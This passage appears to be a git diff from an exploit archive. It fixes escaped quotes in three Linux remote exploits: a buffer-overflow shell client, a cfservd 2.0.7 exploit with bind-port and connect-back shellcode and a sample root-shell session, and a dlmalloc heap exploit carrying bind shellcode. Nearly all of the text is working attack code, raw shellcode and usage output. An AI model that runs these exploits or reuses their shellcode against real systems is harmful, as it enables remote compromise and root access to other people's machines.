target_hostname -p 8000 -t num\n",x_fp_rm); -fprintf(stdout,\" Select target number>\\n\\n\"); +fprintf(stdout," Select target number>\n\n"); for(;;) @@ -182,7 +182,7 @@ else { -fprintf(stdout,\"\\t {%d} %s\\n\",__pl_form[__t_xmp].op_plat_num,__pl_form[__t_xmp].op_plat_sys); +fprintf(stdout,"\t {%d} %s\n",__pl_form[__t_xmp].op_plat_num,__pl_form[__t_xmp].op_plat_sys); } @@ -190,7 +190,7 @@ __t_xmp++; } -fprintf(stdout,\"\\n\"); +fprintf(stdout,"\n"); exit(0); } @@ -218,7 +218,7 @@ u_long retaddr=__pl_form[type].retaddr; (void)banrl(); -while((whlp=getopt(argc,argv,\"T:t:H:h:P:p:IiXx\"))!=EOF) +while((whlp=getopt(argc,argv,"T:t:H:h:P:p:IiXx"))!=EOF) { @@ -228,9 +228,9 @@ switch(whlp) { -case \'T\': +case 'T': -case \'t\': +case 't': if((type=atoi(optarg))<6) @@ -248,9 +248,9 @@ break; -case \'H\': +case 'H': -case \'h\': +case 'h': memset((char *)hostname,0,sizeof(hostname)); @@ -260,9 +260,9 @@ break; -case \'P\': +case 'P': -case \'p\': +case 'p': port=atoi(optarg); @@ -270,17 +270,17 @@ break; -case \'I\': +case 'I': -case \'i\': +case 'i': -fprintf(stderr,\" Try `%s -?\' for more information.\\n\\n\",argv[0]); +fprintf(stderr," Try `%s -?' for more information.\n\n",argv[0]); exit(-1); -case \'?\': +case '?': (void)x_fp_rm_usage(argv[0]); @@ -302,35 +302,35 @@ if(!strcmp(hostname,D_HOST)) { -fprintf(stdout,\" [+] Hostname: %s\\n\",hostname); +fprintf(stdout," [+] Hostname: %s\n",hostname); -fprintf(stdout,\" [+] Port num: %d\\n\",port); +fprintf(stdout," [+] Port num: %d\n",port); -fprintf(stdout,\" [+] Retaddr address: %p\\n\",retaddr); +fprintf(stdout," [+] Retaddr address: %p\n",retaddr); } -fprintf(stdout,\" [1] #1 Set codes.\\n\"); +fprintf(stdout," [1] #1 Set codes.\n"); if(!(buf=(char *)malloc(BUFSIZE+1))) - printe(\"getcode(): allocating memory failed.\",1); + printe("getcode(): allocating memory failed.",1); memset(buf, 0x90, BUFSIZE); - buf[0] = \'1\'; - buf[1] = \'1\'; - buf[2] = \'1\'; - buf[3] = \'1\'; - buf[4] = \'1\'; - buf[5] = \'1\'; - buf[6] = \'1\'; + buf[0] = '1'; + buf[1] = '1'; + buf[2] = '1'; + buf[3] = '1'; + buf[4] = '1'; + buf[5] = '1'; + buf[6] = '1'; memset(buf+7,0x90,636); @@ -354,17 +354,17 @@ fprintf(stdout,\" [1] #1 Set codes.\\n\"); memcpy(&buf[BUFSIZE-(9*sizeof(retaddr))], &retaddr, sizeof(retaddr)); - fprintf(stdout,\" [1] #1 Set socket.\\n\"); + fprintf(stdout," [1] #1 Set socket.\n"); sd=sock_connect(hostname,port); -fprintf(stdout,\" [1] #1 Send codes.\\n\"); +fprintf(stdout," [1] #1 Send codes.\n"); write(sd,buf,BUFSIZE); close(sd); sleep(1); -fprintf(stdout,\" [1] #3 Get shell.\\n\"); +fprintf(stdout," [1] #3 Get shell.\n"); getshell(hostname,26112); exit(0); @@ -386,13 +386,13 @@ unsigned short port){ s.sin_port=htons(port); - printf(\"[*] attempting to connect: %s:%d.\\n\",hostname,port); + printf("[*] attempting to connect: %s:%d.\n",hostname,port); if((s.sin_addr.s_addr=inet_addr(hostname))){ if(!(t=gethostbyname(hostname))) - printe(\"couldn\'t resolve hostname.\",1); + printe("couldn't resolve hostname.",1); memcpy((char*)&s.sin_addr,(char*)t->h_addr, @@ -406,11 +406,11 @@ unsigned short port){ if(connect(sock,(struct sockaddr *)&s,sizeof(s))) - printe(\"netris connection failed.\",1); + printe("netris connection failed.",1); alarm(0); - printf(\"[*] successfully connected: %s:%d.\\n\",hostname,port); + printf("[*] successfully connected: %s:%d.\n",hostname,port); return(sock); @@ -428,11 +428,11 @@ void getshell(char *hostname,unsigned short port){ struct sockaddr_in sa; - printf(\"[*] checking to see if the exploit was successful.\\n\"); + printf("[*] checking to see if the exploit was successful.\n"); if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==-1) - printe(\"getshell(): socket() failed.\",1); + printe("getshell(): socket() failed.",1); sa.sin_family=AF_INET; @@ -440,7 +440,7 @@ void getshell(char *hostname,unsigned short port){ if(!(he=gethostbyname(hostname))) - printe(\"getshell(): couldn\'t resolve.\",1); + printe("getshell(): couldn't resolve.",1); memcpy((char *)&sa.sin_addr,(char *)he->h_addr, @@ -454,11 +454,11 @@ void getshell(char *hostname,unsigned short port){ alarm(TIMEOUT); - printf(\"[*] attempting to connect: %s:%d.\\n\",hostname,port); + printf("[*] attempting to connect: %s:%d.\n",hostname,port); if(connect(sock,(struct sockaddr *)&sa,sizeof(sa))){ - printf(\"[!] connection failed: %s:%d.\\n\",hostname,port); + printf("[!] connection failed: %s:%d.\n",hostname,port); return; @@ -466,11 +466,11 @@ void getshell(char *hostname,unsigned short port){ alarm(0); - printf(\"[*] successfully connected: %s:%d.\\n\\n\",hostname,port); + printf("[*] successfully connected: %s:%d.\n\n",hostname,port); signal(SIGINT,SIG_IGN); - write(sock,\"uname -a;id\\n\",13); + write(sock,"uname -a;id\n",13); while(1){ @@ -482,17 +482,17 @@ void getshell(char *hostname,unsigned short port){ if(select(sock+1,&fds,0,0,0)<1) - printe(\"getshell(): select() failed.\",1); + printe("getshell(): select() failed.",1); if(FD_ISSET(0,&fds)){ if((r=read(0,buf,4096))<1) - printe(\"getshell(): read() failed.\",1); + printe("getshell(): read() failed.",1); if(write(sock,buf,r)!=r) - printe(\"getshell(): write() failed.\",1); + printe("getshell(): write() failed.",1); } @@ -516,9 +516,9 @@ void getshell(char *hostname,unsigned short port){ void printe(char *err,short e){ - fprintf(stdout,\" [-] Failed.\\n\\n\"); + fprintf(stdout," [-] Failed.\n\n"); - fprintf(stdout,\" Happy Exploit ! :-)\\n\\n\"); + fprintf(stdout," Happy Exploit ! :-)\n\n"); diff --git a/platforms/linux/remote/23183.c b/platforms/linux/remote/23183.c index 3f1b8b7be..513cc5c1f 100755 --- a/platforms/linux/remote/23183.c +++ b/platforms/linux/remote/23183.c @@ -10,11 +10,11 @@ The vulnerability may be exploited to execute arbitrary code with the privileges * Date: 4 November 2003 * * * * Yet another version.. no big deal.. nothing special.. * - * just an extra built-in support for \'connect-back\' shell.. * - * so that I dun need \'nc -l -p 31337\' stuffs... duh !?! * + * just an extra built-in support for 'connect-back' shell.. * + * so that I dun need 'nc -l -p 31337' stuffs... duh !?! * * * * Anyway.. credit should go to Nick Cleaton who disovered * - * this nice little \'bug\'... ;) * + * this nice little 'bug'... ;) * * * * As usual, use it at your very own risk... * * But then again, I really doubt this code will work for you * @@ -48,11 +48,11 @@ Transaction Receive [88888][] RecvSocketStream(8888) (Concatenated 4192 from stream) Transmission empty... -Received: [\'\\x90\'......1???QQQ?f????PPfha,fS?SRQ???1?? +Received: ['\x90'......1???QQQ?f????PPfha,fS?SRQ???1?? 1??1?R?f?????0?1??PW?f?????9?@1 ?1????1??? 1???1?h//shh/bin?PS??1??1 ?? on socket -1869574000 Transaction Send[t 20][Packed text] -cfservd: Couldn\'t send +cfservd: Couldn't send cfservd: send cfservd: Closing connection @@ -68,7 +68,7 @@ Cfservd Remote Exploit by snooq [ jinyean@hotmail.com ] Tested to work against cfservd 2.0.7 on Redhat 8.0 -> Using return address of 0x4029eeff --> \'Connecting\' mode... +-> 'Connecting' mode... -> Exploit string sent. Waiting for a shell... -> Connecting to shell at 192.168.1.1:24876 uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys), @@ -89,7 +89,7 @@ Cfservd Remote Exploit by snooq [ jinyean@hotmail.com ] Tested to work against cfservd 2.0.7 on Redhat 8.0 -> Using return address of 0x4029eeff --> \'Listening\' mode...( port: 24876 ) +-> 'Listening' mode...( port: 24876 ) -> Exploit string sent.... -> Waiting for connection.... -> Connection from: 192.168.1.1 @@ -132,61 +132,61 @@ exit #define SC_SIZE_1 sizeof(bindport) #define SC_SIZE_2 sizeof(connback) -#define CMD \"/usr/bin/id\\n\" +#define CMD "/usr/bin/id\n" /* - * Shellcode were shamelessly ripped from netric\'s code... =p + * Shellcode were shamelessly ripped from netric's code... =p */ char bindport[]= - \"\\x31\\xc0\\x31\\xdb\\x31\\xc9\\x51\\xb1\" - \"\\x06\\x51\\xb1\\x01\\x51\\xb1\\x02\\x51\" - \"\\x89\\xe1\\xb3\\x01\\xb0\\x66\\xcd\\x80\" - \"\\x89\\xc1\\x31\\xc0\\x31\\xdb\\x50\\x50\" - \"\\x50\\x66\\x68\\x61\\x2c\\xb3\\x02\\x66\" - \"\\x53\\x89\\xe2\\xb3\\x10\\x53\\xb3\\x02\" - \"\\x52\\x51\\x89\\xca\\x89\\xe1\\xb0\\x66\" - \"\\xcd\\x80\\x31\\xdb\\x39\\xc3\\x74\\x05\" - \"\\x31\\xc0\\x40\\xcd\\x80\\x31\\xc0\\x50\" - \"\\x52\\x89\\xe1\\xb3\\x04\\xb0\\x66\\xcd\" - \"\\x80\\x89\\xd7\\x31\\xc0\\x31\\xdb\\x31\" - \"\\xc9\\xb3\\x11\\xb1\\x01\\xb0\\x30\\xcd\" - \"\\x80\\x31\\xc0\\x31\\xdb\\x50\\x50\\x57\" - \"\\x89\\xe1\\xb3\\x05\\xb0\\x66\\xcd\\x80\" - \"\\x89\\xc6\\x31\\xc0\\x31\\xdb\\xb0\\x02\" - \"\\xcd\\x80\\x39\\xc3\\x75\\x40\\x31\\xc0\" - \"\\x89\\xfb\\xb0\\x06\\xcd\\x80\\x31\\xc0\" - \"\\x31\\xc9\\x89\\xf3\\xb0\\x3f\\xcd\\x80\" - \"\\x31\\xc0\\x41\\xb0\\x3f\\xcd\\x80\\x31\" - \"\\xc0\\x41\\xb0\\x3f\\xcd\\x80\\x31\\xc0\" - \"\\x50\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\" - \"\\x62\\x69\\x6e\\x89\\xe3\\x8b\\x54\\x24\" - \"\\x08\\x50\\x53\\x89\\xe1\\xb0\\x0b\\xcd\" - \"\\x80\\x31\\xc0\\x40\\xcd\\x80\\x31\\xc0\" - \"\\x89\\xf3\\xb0\\x06\\xcd\\x80\\xeb\\x99\"; + "\x31\xc0\x31\xdb\x31\xc9\x51\xb1" + "\x06\x51\xb1\x01\x51\xb1\x02\x51" + "\x89\xe1\xb3\x01\xb0\x66\xcd\x80" + "\x89\xc1\x31\xc0\x31\xdb\x50\x50" + "\x50\x66\x68\x61\x2c\xb3\x02\x66" + "\x53\x89\xe2\xb3\x10\x53\xb3\x02" + "\x52\x51\x89\xca\x89\xe1\xb0\x66" + "\xcd\x80\x31\xdb\x39\xc3\x74\x05" + "\x31\xc0\x40\xcd\x80\x31\xc0\x50" + "\x52\x89\xe1\xb3\x04\xb0\x66\xcd" + "\x80\x89\xd7\x31\xc0\x31\xdb\x31" + "\xc9\xb3\x11\xb1\x01\xb0\x30\xcd" + "\x80\x31\xc0\x31\xdb\x50\x50\x57" + "\x89\xe1\xb3\x05\xb0\x66\xcd\x80" + "\x89\xc6\x31\xc0\x31\xdb\xb0\x02" + "\xcd\x80\x39\xc3\x75\x40\x31\xc0" + "\x89\xfb\xb0\x06\xcd\x80\x31\xc0" + "\x31\xc9\x89\xf3\xb0\x3f\xcd\x80" + "\x31\xc0\x41\xb0\x3f\xcd\x80\x31" + "\xc0\x41\xb0\x3f\xcd\x80\x31\xc0" + "\x50\x68\x2f\x2f\x73\x68\x68\x2f" + "\x62\x69\x6e\x89\xe3\x8b\x54\x24" + "\x08\x50\x53\x89\xe1\xb0\x0b\xcd" + "\x80\x31\xc0\x40\xcd\x80\x31\xc0" + "\x89\xf3\xb0\x06\xcd\x80\xeb\x99"; char connback[]= - \"\\x31\\xc0\\x31\\xdb\\x31\\xc9\\x51\\xb1\" - \"\\x06\\x51\\xb1\\x01\\x51\\xb1\\x02\\x51\" - \"\\x89\\xe1\\xb3\\x01\\xb0\\x66\\xcd\\x80\" - \"\\x89\\xc2\\x31\\xc0\\x31\\xc9\\x51\\x51\" - \"\\x68\\x41\\x42\\x43\\x44\\x66\\x68\\xb0\" - \"\\xef\\xb1\\x02\\x66\\x51\\x89\\xe7\\xb3\" - \"\\x10\\x53\\x57\\x52\\x89\\xe1\\xb3\\x03\" - \"\\xb0\\x66\\xcd\\x80\\x31\\xc9\\x39\\xc1\" - \"\\x74\\x06\\x31\\xc0\\xb0\\x01\\xcd\\x80\" - \"\\x31\\xc0\\xb0\\x3f\\x89\\xd3\\xcd\\x80\" - \"\\x31\\xc0\\xb0\\x3f\\x89\\xd3\\xb1\\x01\" - \"\\xcd\\x80\\x31\\xc0\\xb0\\x3f\\x89\\xd3\" - \"\\xb1\\x02\\xcd\\x80\\x31\\xc0\\x31\\xd2\" - \"\\x50\\x68\\x6e\\x2f\\x73\\x68\\x68\\x2f\" - \"\\x2f\\x62\\x69\\x89\\xe3\\x50\\x53\\x89\" - \"\\xe1\\xb0\\x0b\\xcd\\x80\\x31\\xc0\\xb0\" - \"\\x01\\xcd\\x80\"; + "\x31\xc0\x31\xdb\x31\xc9\x51\xb1" + "\x06\x51\xb1\x01\x51\xb1\x02\x51" + "\x89\xe1\xb3\x01\xb0\x66\xcd\x80" + "\x89\xc2\x31\xc0\x31\xc9\x51\x51" + "\x68\x41\x42\x43\x44\x66\x68\xb0" + "\xef\xb1\x02\x66\x51\x89\xe7\xb3" + "\x10\x53\x57\x52\x89\xe1\xb3\x03" + "\xb0\x66\xcd\x80\x31\xc9\x39\xc1" + "\x74\x06\x31\xc0\xb0\x01\xcd\x80" + "\x31\xc0\xb0\x3f\x89\xd3\xcd\x80" + "\x31\xc0\xb0\x3f\x89\xd3\xb1\x01" + "\xcd\x80\x31\xc0\xb0\x3f\x89\xd3" + "\xb1\x02\xcd\x80\x31\xc0\x31\xd2" + "\x50\x68\x6e\x2f\x73\x68\x68\x2f" + "\x2f\x62\x69\x89\xe3\x50\x53\x89" + "\xe1\xb0\x0b\xcd\x80\x31\xc0\xb0" + "\x01\xcd\x80"; /* * Ugly select() stuffs.... - * Modified (a little) from TESO\'s code.. + * Modified (a little) from TESO's code.. * to support connect back shell.... ;) */ @@ -206,7 +206,7 @@ void doshell(int sock) { if (FD_ISSET (0, &rfds)) { l = read (0, buf, sizeof (buf)); if (l <= 0) { - fprintf(stdout,\"-> Connection closed by local user\\n\"); + fprintf(stdout,"-> Connection closed by local user\n"); exit (EXIT_FAILURE); } sent=0; @@ -222,10 +222,10 @@ void doshell(int sock) { if (FD_ISSET (sock, &rfds)) { l = read (sock, buf, sizeof (buf)); if (l == 0) { - fprintf(stdout,\"-> Connection closed by remote host.\\n\"); + fprintf(stdout,"-> Connection closed by remote host.\n"); exit (EXIT_FAILURE); } else if (l < 0) { - fprintf(stdout,\"-> read() error\\n\"); + fprintf(stdout,"-> read() error\n"); exit (EXIT_FAILURE); } write (1, buf, l); @@ -255,38 +255,38 @@ void changeport(char *code, int port, int offset) { void sendcmd(int sock) { if (send(sock,CMD,strlen(CMD),0)<0) { - err_exit(\"-> send() error\"); + err_exit("-> send() error"); } } void usage(char *s) { - fprintf(stdout,\"\\nUsage: %s [-options]\\n\\n\",s); - fprintf(stdout,\"\\t-r\\tSize of \'return addresses\'\\n\"); - fprintf(stdout,\"\\t-b\\tThe overall size of the buffer\\n\"); - fprintf(stdout,\"\\t-a\\tAlignment size [0~3]\\n\"); - fprintf(stdout,\"\\t-t\\tTarget\'s port\\n\"); - fprintf(stdout,\"\\t-s\\tPort to bind shell to (in \'connecting\' mode), or\\n\"); - fprintf(stdout,\"\\t\\tPort for shell to connect back (in \'listening\' mode)\\n\"); - fprintf(stdout,\"\\t-o\\tOffset from the default return address\\n\"); - fprintf(stdout,\"\\t-h\\tTarget\'s IP\\n\"); - fprintf(stdout,\"\\t-l\\tListening for shell connecting\\n\"); - fprintf(stdout,\"\\t\\tback to port specified by \'-s\' switch\\n\"); - fprintf(stdout,\"\\t-i\\tIP for shell to connect back\\n\"); - fprintf(stdout,\"\\t-T\\tNumber of seconds to wait for connection\\n\\n\"); - fprintf(stdout,\"\\tNotes:\\n\\t======\\n\\t\'-h\' is mandatory\\n\"); - fprintf(stdout,\"\\t\'-i\' is mandatory if \'-l\' is specified\\n\\n\"); + fprintf(stdout,"\nUsage: %s [-options]\n\n",s); + fprintf(stdout,"\t-r\tSize of 'return addresses'\n"); + fprintf(stdout,"\t-b\tThe overall size of the buffer\n"); + fprintf(stdout,"\t-a\tAlignment size [0~3]\n"); + fprintf(stdout,"\t-t\tTarget's port\n"); + fprintf(stdout,"\t-s\tPort to bind shell to (in 'connecting' mode), or\n"); + fprintf(stdout,"\t\tPort for shell to connect back (in 'listening' mode)\n"); + fprintf(stdout,"\t-o\tOffset from the default return address\n"); + fprintf(stdout,"\t-h\tTarget's IP\n"); + fprintf(stdout,"\t-l\tListening for shell connecting\n"); + fprintf(stdout,"\t\tback to port specified by '-s' switch\n"); + fprintf(stdout,"\t-i\tIP for shell to connect back\n"); + fprintf(stdout,"\t-T\tNumber of seconds to wait for connection\n\n"); + fprintf(stdout,"\tNotes:\n\t======\n\t'-h' is mandatory\n"); + fprintf(stdout,"\t'-i' is mandatory if '-l' is specified\n\n"); exit(0); } void sigalrm() { - fprintf(stdout,\"-> Nope.. I ain\'t waiting any longer.. =p\\n\"); + fprintf(stdout,"-> Nope.. I ain't waiting any longer.. =p\n"); exit(0); } int main(int argc, char *argv[]) { char opt; - char *buf, *ptr, *ip=\"\"; + char *buf, *ptr, *ip=""; struct sockaddr_in sockadd; int i, s1, s2, i_len, ok=0, mode=0; int time_out=TIME_OUT, scsize=SC_SIZE_1; @@ -296,48 +296,48 @@ int main(int argc, char *argv[]) { if (argc<2) { usage(argv[0]); } - while ((opt=getopt(argc,argv,\"i:r:b:a:h:t:s:o:T:l\"))!=EOF) { + while ((opt=getopt(argc,argv,"i:r:b:a:h:t:s:o:T:l"))!=EOF) { switch(opt) { - case \'i\': + case 'i': ip=optarg; changeip(ip); break; - case \'l\': + case 'l': mode=1; scsize=SC_SIZE_2; break; - case \'T\': + case 'T': time_out=atoi(optarg); break; - case \'b\': + case 'b': buffsize=atoi(optarg); break; - case \'a\': + case 'a': align=atoi(optarg); break; - case \'h\': + case 'h': ok=1; sockadd.sin_addr.s_addr = inet_addr(optarg); break; - case \'r\': + case 'r': retsize=atoi(optarg); break; - case \'t\': + case 't': t_port=atoi(optarg); break; - case \'s\': + case 's': s_port=atoi(optarg); break; - case \'o\': + case 'o': offset=atoi(optarg); break; @@ -347,16 +347,16 @@ int main(int argc, char *argv[]) { } } - if (!ok || (mode&&((strcmp(ip,\"\")==0)) ) ) { usage(argv[0]); } + if (!ok || (mode&&((strcmp(ip,"")==0)) ) ) { usage(argv[0]); } if (!(buf=malloc(buffsize+1))) { - err_exit(\"-> malloc() error\"); + err_exit("-> malloc() error"); } ret_addr=RET_ADDR-offset; - fprintf(stdout,\"\\nCfservd Remote Exploit by snooq [ jinyean@hotmail.com ]\\n\"); - fprintf(stdout,\"Tested to work against cfservd 2.0.7 on Redhat 8.0\\n\\n\"); - fprintf(stdout,\"-> Using return address of 0x%08x\\n\", ret_addr); + fprintf(stdout,"\nCfservd Remote Exploit by snooq [ jinyean@hotmail.com ]\n"); + fprintf(stdout,"Tested to work against cfservd 2.0.7 on Redhat 8.0\n\n"); + fprintf(stdout,"-> Using return address of 0x%08x\n", ret_addr); ptr=buf; for(i=0;i socket error\"); + err_exit("-> socket error"); } if(connect(s1,(struct sockaddr *)&sockadd, sizeof(sockadd))<0) { - err_exit(\"-> connect() error\"); + err_exit("-> connect() error"); } if (mode) { - fprintf(stdout,\"-> \'Listening\' mode...( port: %d )\\n\",s_port); + fprintf(stdout,"-> 'Listening' mode...( port: %d )\n",s_port); if (fork()==0) { sleep(2); if (send(s1,buf,buffsize,0)<0) { - err_exit(\"-> send() error\"); + err_exit("-> send() error"); } - fprintf(stdout,\"-> Exploit string sent....\\n\"); + fprintf(stdout,"-> Exploit string sent....\n"); exit(0); } @@ -405,7 +405,7 @@ int main(int argc, char *argv[]) { alarm(time_out); if ((s2=socket(AF_INET,SOCK_STREAM,0))<0) { - err_exit(\"-> socket error\"); + err_exit("-> socket error"); } memset(&sockadd,0,sizeof(sockadd)); @@ -415,26 +415,26 @@ int main(int argc, char *argv[]) { i_len=sizeof(sockadd); if (bind(s2,(struct sockaddr *)&sockadd,i_len)<0) { - err_exit(\"-> bind() error\"); + err_exit("-> bind() error"); } if (listen(s2,0)<0) { - err_exit(\"-> listen() error\"); + err_exit("-> listen() error"); } wait(); close(s1); - fprintf(stdout,\"-> Waiting for connection....\\n\"); + fprintf(stdout,"-> Waiting for connection....\n"); s1=accept(s2,(struct sockaddr *)&sockadd,&i_len); if (s1<0) { - err_exit(\"-> accept() error\"); + err_exit("-> accept() error"); } alarm(0); - fprintf(stdout,\"-> Connection from: %s\\n\",inet_ntoa(sockadd.sin_addr)); + fprintf(stdout,"-> Connection from: %s\n",inet_ntoa(sockadd.sin_addr)); sendcmd(s1); doshell(s1); @@ -446,28 +446,28 @@ int main(int argc, char *argv[]) { else { if (send(s1,buf,buffsize,0)<0) { - err_exit(\"-> send() error\"); + err_exit("-> send() error"); } close(s1); - fprintf(stdout,\"-> \'Connecting\' mode...\\n\"); - fprintf(stdout,\"-> Exploit string sent. Waiting for a shell...\\n\"); + fprintf(stdout,"-> 'Connecting' mode...\n"); + fprintf(stdout,"-> Exploit string sent. Waiting for a shell...\n"); sleep(2); sockadd.sin_family = AF_INET; sockadd.sin_port = htons(s_port); if ((s1=socket(AF_INET,SOCK_STREAM,0))<0) { - err_exit(\"-> socket() error\"); + err_exit("-> socket() error"); } if(connect(s1,(struct sockaddr *)&sockadd, sizeof(sockadd))<0) { - fprintf(stdout,\"-> Exploit failed. Target probably segfaulted...\\n\\n\"); + fprintf(stdout,"-> Exploit failed. Target probably segfaulted...\n\n"); exit(0); } - fprintf(stdout,\"-> Connecting to shell at %s:%d\\n\",inet_ntoa(sockadd.sin_addr),s_port); + fprintf(stdout,"-> Connecting to shell at %s:%d\n",inet_ntoa(sockadd.sin_addr),s_port); sendcmd(s1); doshell(s1); diff --git a/platforms/linux/remote/25275.c b/platforms/linux/remote/25275.c index 5ed10bcb6..b22b851d3 100755 --- a/platforms/linux/remote/25275.c +++ b/platforms/linux/remote/25275.c @@ -26,29 +26,29 @@ This BID will be updated when more information becomes available. * * Notes: * - * You can\'t have any characters in overflow buffer that isspace() returns true + * You can't have any characters in overflow buffer that isspace() returns true * for. The shellcode is clear of them, but if your return address or retloc * has one you gotta figure out another one. My slack box has that situation, * heap is at 0x080d.. My gentoo laptop had no such problem and all was fine. I - * don\'t have anymore time to BS around with this and make perfect for any and - * all, b/c I\'ve got exam to study for and Law and Order:CI is on in an hour. - * If the heap you\'re targetting is the same way, then try filling it up using - * some other commands. If the GOT you\'re targetting is at such address than - * overwrite a return address on the stack. Surely there\'s a way, check out the - * source and be creative; I\'m sure there are some memory leaks somewhere you + * don't have anymore time to BS around with this and make perfect for any and + * all, b/c I've got exam to study for and Law and Order:CI is on in an hour. + * If the heap you're targetting is the same way, then try filling it up using + * some other commands. If the GOT you're targetting is at such address than + * overwrite a return address on the stack. Surely there's a way, check out the + * source and be creative; I'm sure there are some memory leaks somewhere you * can use to fill up heap as well. * * You might run into some ugliness trying to automate this for a couple * reasons. xmalloc() stores a cookie in front of buffer, and xfree() checks - * for this cookie before calling free(). So you\'re going to need that aligned + * for this cookie before calling free(). So you're going to need that aligned * properly unless you can cook up a way to exploit it when it bails out in * xfree() b/c of bad cookie and calls write_log() (this func calls malloc() so * maybe you can be clever and do something there). Furthermore I found that * when trying to trigger this multiple times the alignment was different each - * time. There are \"definitely\" more reliable ways to exploit this if you take - * a deeper look into code which I don\'t have time to do right now. The padding + * time. There are "definitely" more reliable ways to exploit this if you take + * a deeper look into code which I don't have time to do right now. The padding * parameter controls the alignment and the size of the chunk being allocated. - * You\'ll probably have to play with it. Yes that\'s fugly. + * You'll probably have to play with it. Yes that's fugly. * * [n00b@crapbox.outernet] ./a.out * Usage: ./a.out < host > < padding > < retloc > < retaddr > @@ -67,11 +67,11 @@ This BID will be updated when more information becomes available. * * --{ Going for shell in 15 14 13 12 11 10 9 8 7 6 5 4 3 2 1 * - * --{ Attempting to redefine the meaning of \'definitely\' + * --{ Attempting to redefine the meaning of 'definitely' * * --{ Got a shell * - * --{ Updating Webster\'s + * --{ Updating Webster's * --{ definitely, adv.: * --{ 1. See specious * @@ -110,7 +110,7 @@ This BID will be updated when more information becomes available. #define Z(x, len) memset((x), 0, (len)) #define die(x) do{ perror((x)); exit(EXIT_FAILURE); }while(0) -#define bye(fmt, args...) do{ fprintf(stderr, fmt\"\\n\", ##args); +#define bye(fmt, args...) do{ fprintf(stderr, fmt"\n", ##args); #exit(EXIT_FAILURE); }while(0) @@ -119,15 +119,15 @@ This BID will be updated when more information becomes available. #define SHELL_PORT 6969 #define NOP 0x90 char sc[] = -\"\\xeb\\x0e\"\"notexploitable\" -\"\\x31\\xc0\\x50\\x50\\x66\\xc7\\x44\\x24\\x02\\x1b\\x39\\xc6\\x04\\x24\\x02\\x89\\xe6\\xb0\\x02\" -\"\\xcd\\x80\\x85\\xc0\\x74\\x08\\x31\\xc0\\x31\\xdb\\xb0\\x01\\xcd\\x80\\x50\\x6a\\x01\\x6a\\x02\" -\"\\x89\\xe1\\x31\\xdb\\xb0\\x66\\xb3\\x01\\xcd\\x80\\x89\\xc5\\x6a\\x10\\x56\\x50\\x89\\xe1\\xb0\" -\"\\x66\\xb3\\x02\\xcd\\x80\\x6a\\x01\\x55\\x89\\xe1\\x31\\xc0\\x31\\xdb\\xb0\\x66\\xb3\\x04\\xcd\" -\"\\x80\\x31\\xc0\\x50\\x50\\x55\\x89\\xe1\\xb0\\x66\\xb3\\x05\\xcd\\x80\\x89\\xc5\\x31\\xc0\\x89\" -\"\\xeb\\x31\\xc9\\xb0\\x3f\\xcd\\x80\\x41\\x80\\xf9\\x03\\x7c\\xf6\\x31\\xc0\\x50\\x68\\x2f\\x2f\" -\"\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\x50\\x53\\x89\\xe1\\x99\\xb0\\x6b\\x2c\\x60\\xcd\" -\"\\x80\"; +"\xeb\x0e""notexploitable" +"\x31\xc0\x50\x50\x66\xc7\x44\x24\x02\x1b\x39\xc6\x04\x24\x02\x89\xe6\xb0\x02" +"\xcd\x80\x85\xc0\x74\x08\x31\xc0\x31\xdb\xb0\x01\xcd\x80\x50\x6a\x01\x6a\x02" +"\x89\xe1\x31\xdb\xb0\x66\xb3\x01\xcd\x80\x89\xc5\x6a\x10\x56\x50\x89\xe1\xb0" +"\x66\xb3\x02\xcd\x80\x6a\x01\x55\x89\xe1\x31\xc0\x31\xdb\xb0\x66\xb3\x04\xcd" +"\x80\x31\xc0\x50\x50\x55\x89\xe1\xb0\x66\xb3\x05\xcd\x80\x89\xc5\x31\xc0\x89" +"\xeb\x31\xc9\xb0\x3f\xcd\x80\x41\x80\xf9\x03\x7c\xf6\x31\xc0\x50\x68\x2f\x2f" +"\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x6b\x2c\x60\xcd" +"\x80"; /* a dlmalloc chunk descriptor */ @@ -148,7 +148,7 @@ ssize_t Send(int s, const void *buf, size_t len, int flags) n = send(s, buf, len, flags); if(n < 0) - die(\"send\"); + die("send"); return n; } @@ -160,7 +160,7 @@ ssize_t Recv(int s, void *buf, size_t len, int flags) n = recv(s, buf, len, flags); if(n < 0) - die(\"recv\"); + die("recv"); return n; } @@ -176,7 +176,7 @@ int conn(char *host, u_short port) hp = gethostbyname(host); if (hp == NULL) { - bye(\"gethostbyname failed with error %s\", hstrerror(h_errno)); + bye("gethostbyname failed with error %s", hstrerror(h_errno)); } sa.sin_family = AF_INET; sa.sin_port = htons(port); @@ -184,10 +184,10 @@ int conn(char *host, u_short port) sock = socket(AF_INET, SOCK_STREAM, 0); if (sock < 0) - die(\"socket\"); + die("socket"); if (connect(sock, (struct sockaddr *) &sa, sizeof(sa)) < 0) - die(\"connect\"); + die("connect"); return sock; } @@ -201,15 +201,15 @@ void shell(char *host, u_short port) sock = conn(host, port); - printf(\"--{ Got a shell\\n\\n\" - \"--{ Updating Webster\'s\\n\" - \"--{ definitely, adv.:\\n\" - \"--{ 1. See specious\\n\\n\" - \"--{ For the linguistically challenged...\\n\" - \"--{ specious, adj. :\\n\" - \"--{ 1. Having the ring of truth or plausibility but \" - \"actually fallacious\\n\" - \"--{ 2. Deceptively attractive\\n\\n\" + printf("--{ Got a shell\n\n" + "--{ Updating Webster's\n" + "--{ definitely, adv.:\n" + "--{ 1. See specious\n\n" + "--{ For the linguistically challenged...\n" + "--{ specious, adj. :\n" + "--{ 1. Having the ring of truth or plausibility but " + "actually fallacious\n" + "--{ 2. Deceptively attractive\n\n" ); FD_ZERO(&rfds); @@ -219,29 +219,29 @@ void shell(char *host, u_short port) FD_SET(sock, &rfds); if (select(sock + 1, &rfds, NULL, NULL, NULL) < 1) - die(\"select\"); + die("select"); if (FD_ISSET(STDIN_FILENO, &rfds)) { l = read(0, buf, BS); if(l < 0) - die(\"read\"); + die("read"); else if(l == 0) - bye(\"\\n - Connection closed by user\\n\"); + bye("\n - Connection closed by user\n"); if (write(sock, buf, l) < 1) - die(\"write\"); + die("write"); } if (FD_ISSET(sock, &rfds)) { l = read(sock, buf, sizeof(buf)); if (l == 0) - bye(\"\\n - Connection terminated.\\n\"); + bye("\n - Connection 